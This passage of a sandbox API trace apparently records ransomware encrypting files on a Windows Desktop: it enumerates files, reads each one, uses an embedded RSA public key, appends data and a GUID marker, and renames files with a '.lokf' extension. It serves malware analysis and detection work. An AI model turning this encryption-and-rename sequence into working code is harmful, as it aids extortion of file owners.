lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0 [0059.349] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0059.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0059.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b588 | out: hHeap=0x660000) returned 1 [0059.349] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.349] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.349] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.349] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.349] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\") returned="NxkfKpMd\\" [0059.350] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0059.350] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.350] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.350] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.350] PathFindFileNameW (pszPath="") returned="" [0059.350] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46ed7210, ftCreationTime.dwHighDateTime=0x1d4d250, ftLastAccessTime.dwLowDateTime=0x2c5f7080, ftLastAccessTime.dwHighDateTime=0x1d4cac4, ftLastWriteTime.dwLowDateTime=0x2c5f7080, ftLastWriteTime.dwHighDateTime=0x1d4cac4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0059.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269928 | out: hHeap=0x660000) returned 1 [0059.350] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46ed7210, ftCreationTime.dwHighDateTime=0x1d4d250, ftLastAccessTime.dwLowDateTime=0x2c5f7080, ftLastAccessTime.dwHighDateTime=0x1d4cac4, ftLastWriteTime.dwLowDateTime=0x2c5f7080, ftLastWriteTime.dwHighDateTime=0x1d4cac4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.350] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ff14610, ftCreationTime.dwHighDateTime=0x1d4d2b5, ftLastAccessTime.dwLowDateTime=0xc3d2ea00, ftLastAccessTime.dwHighDateTime=0x1d4ca24, ftLastWriteTime.dwLowDateTime=0xc3d2ea00, ftLastWriteTime.dwHighDateTime=0x1d4ca24, nFileSizeHigh=0x0, nFileSizeLow=0x888b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-Ymy8S 8yhOe9ZasNJRs.flv", cAlternateFileName="-YMY8S~1.FLV")) returned 1 [0059.350] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\-Ymy8S 8yhOe9ZasNJRs.flv") returned=".flv" [0059.350] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\-Ymy8S 8yhOe9ZasNJRs.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nxkfkpmd\\-ymy8s 8yhoe9zasnjrs.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.350] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=34955) returned 1 [0059.350] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.353] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8865, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.353] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.353] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x888b, lpOverlapped=0x0) returned 1 [0059.354] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.354] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.354] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.354] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0059.354] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.354] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.354] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.355] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.355] GetLastError () returned 0x0 [0059.355] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.355] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0059.355] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.355] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.355] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.355] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.355] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.355] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.355] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x888b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.355] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.356] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b930 [0059.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0059.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3294ac8 [0059.356] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.356] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b930 | out: hHeap=0x660000) returned 1 [0059.356] WriteFile (in: hFile=0x5cc, lpBuffer=0x3294ac8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3294ac8*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.356] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3294ac8 | out: hHeap=0x660000) returned 1 [0059.356] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.356] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.356] CloseHandle (hObject=0x5cc) returned 1 [0059.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0059.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8a0) returned 0x3268798 [0059.357] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0059.357] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\-Ymy8S 8yhOe9ZasNJRs.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nxkfkpmd\\-ymy8s 8yhoe9zasnjrs.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\-Ymy8S 8yhOe9ZasNJRs.flv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nxkfkpmd\\-ymy8s 8yhoe9zasnjrs.flv.lokf")) returned 1 [0059.357] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.357] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.357] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0059.358] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c9db60, ftCreationTime.dwHighDateTime=0x1d4d0df, ftLastAccessTime.dwLowDateTime=0x734ef9c0, ftLastAccessTime.dwHighDateTime=0x1d4c63c, ftLastWriteTime.dwLowDateTime=0x734ef9c0, ftLastWriteTime.dwHighDateTime=0x1d4c63c, nFileSizeHigh=0x0, nFileSizeLow=0x7b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2qd8JzHjkGInT4Dq.png", cAlternateFileName="2QD8JZ~1.PNG")) returned 1 [0059.358] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b930 [0059.358] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adb18 [0059.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b930 | out: hHeap=0x660000) returned 1 [0059.358] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\2qd8JzHjkGInT4Dq.png") returned=".png" [0059.358] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\2qd8JzHjkGInT4Dq.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nxkfkpmd\\2qd8jzhjkgint4dq.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.358] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=1975) returned 1 [0059.359] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.361] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x791, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.361] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.362] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.362] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x7b7, lpOverlapped=0x0) returned 1 [0059.362] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.362] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.362] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.362] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0059.363] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.363] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.363] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.363] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.363] GetLastError () returned 0x0 [0059.363] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.363] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0059.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.363] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.363] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.363] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7c0) returned 0x3297a68 [0059.363] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0059.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c87c68 [0059.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b610 [0059.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c87cb0 [0059.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b628 [0059.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b658 [0059.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b670 [0059.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.364] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3268798 [0059.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b658 | out: hHeap=0x660000) returned 1 [0059.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b670 | out: hHeap=0x660000) returned 1 [0059.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0059.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b670 [0059.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b658 [0059.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0059.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0059.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0059.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0059.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b670 | out: hHeap=0x660000) returned 1 [0059.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b658 | out: hHeap=0x660000) returned 1 [0059.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0059.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.364] GetCurrentThreadId () returned 0x9e0 [0059.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c83968 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.365] HeapFree (in: hHeap=0x660000, 